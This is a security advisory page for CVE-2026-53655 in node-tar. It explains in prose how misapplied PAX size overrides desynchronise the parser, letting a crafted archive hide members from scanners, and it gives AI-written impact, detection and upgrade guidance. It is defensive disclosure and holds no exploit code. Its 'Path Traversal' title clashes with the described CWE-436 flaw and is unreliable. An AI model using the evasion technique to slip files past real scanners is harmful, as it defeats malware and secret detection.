CVE-2026-53655
Received Received - Intake
Path Traversal in node-tar Archive Parser

Publication date: 2026-06-22

Last updated on: 2026-06-22

Assigner: GitHub, Inc.

Description
node-tar is a full-featured Tar for Node.js. Prior to 7.5.16, tar (node-tar) applies a PAX extended header's size= record (and other PAX overrides) to the next header entry of any type, including intermediary metadata headers such as a GNU long-name (L) or long-link (K) entry. Per POSIX pax, a PAX extended header (x) describes the next file entry, not the intermediary extension headers that may sit between the x header and the file it annotates. Because node-tar lets the PAX size override the byte length of an intervening L/K/x header, an attacker can desynchronize node-tar's stream cursor relative to every other mainstream tar implementation (GNU tar, libarchive/bsdtar, Python tarfile, and the now-fixed tar-rs / astral-tokio-tar). The result is a tar parser interpretation differential (CWE-436): a single crafted archive yields a different set of members under node-tar than under the reference tar tools. An attacker can use this to hide a member from one parser while it is visible to another, which defeats security tooling whose scanner and extractor disagree on archive contents (e.g. a malware/secret scanner that lists entries with one library while a downstream step extracts with another) This vulnerability is fixed in 7.5.16.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-06-22
Last Modified
2026-06-22
Generated
2026-06-22
AI Q&A
2026-06-22
EPSS Evaluated
N/A
NVD
CVE-2026-53655
EUVD
EUVD-2026-38255
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
isaacs node-tar to 7.5.16 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-436 Product A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B's state.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-53655 affects the node-tar library, specifically versions 7.5.15 and earlier. The vulnerability arises because node-tar incorrectly applies PAX extended header size overrides to intermediary metadata headers (such as GNU long-name or long-link headers) instead of only to the subsequent file entry as required by POSIX pax standards.

This causes a desynchronization in node-tar's stream cursor compared to other mainstream tar implementations like GNU tar, libarchive/bsdtar, and Python tarfile. As a result, a crafted tar archive can appear differently when parsed by node-tar versus other tools, leading to a tar parser interpretation differential.

An attacker can exploit this to hide files from node-tar-based scanners while those files remain visible to other tools, potentially bypassing security checks.

Impact Analysis

This vulnerability can impact you by allowing an attacker to craft a tar archive that is interpreted differently by node-tar compared to other tar tools. This means that security scanners or tools using node-tar might not detect certain files or malicious content hidden within the archive.

Such a discrepancy can be exploited to bypass malware or secret scanning tools that rely on node-tar, potentially allowing malicious files to be extracted or executed without detection.

The vulnerability affects the integrity of archive interpretation but does not enable direct remote code execution. Exploitation requires parsing an attacker-supplied tar archive with a vulnerable version of node-tar.

Detection Guidance

This vulnerability can be detected by analyzing tar archives processed by node-tar and comparing the reported archive members against those reported by other mainstream tar implementations such as GNU tar, libarchive/bsdtar, or Python tarfile.

A crafted tar archive that exploits this vulnerability will show a different set of members when parsed by node-tar compared to other tools.

To detect this on your system, you can extract or list the contents of suspicious tar archives using both node-tar and a reference tool like GNU tar and compare the outputs.

  • Use GNU tar to list archive contents: `tar -tf archive.tar`
  • Use node-tar (via a Node.js script or CLI) to list archive contents and compare results.

If the node-tar output shows fewer or different members than GNU tar or other reference tools, this may indicate exploitation of the vulnerability.

Mitigation Strategies

The immediate mitigation step is to upgrade node-tar to version 7.5.16 or later, where the vulnerability is fixed.

The fix involves modifying node-tar to avoid applying PAX size overrides to intermediary extension headers, thus preventing the desynchronization issue.

Until the upgrade can be applied, avoid processing untrusted or attacker-supplied tar archives with vulnerable versions of node-tar.

Additionally, consider validating tar archives with multiple tools to detect discrepancies that might indicate exploitation.

Compliance Impact

This vulnerability allows an attacker to craft tar archives that are interpreted differently by node-tar compared to other mainstream tar implementations. As a result, files can be hidden from security scanners that rely on node-tar while still being extracted or visible by other tools.

Such discrepancies can undermine the effectiveness of security tooling designed to detect malware or sensitive data within archives, potentially leading to unauthorized data exposure or failure to detect malicious content.

In the context of compliance with standards like GDPR or HIPAA, this could mean that data protection measures relying on accurate scanning and extraction of archive contents might be bypassed, increasing the risk of non-compliance due to undetected data leaks or malware.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-53655. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart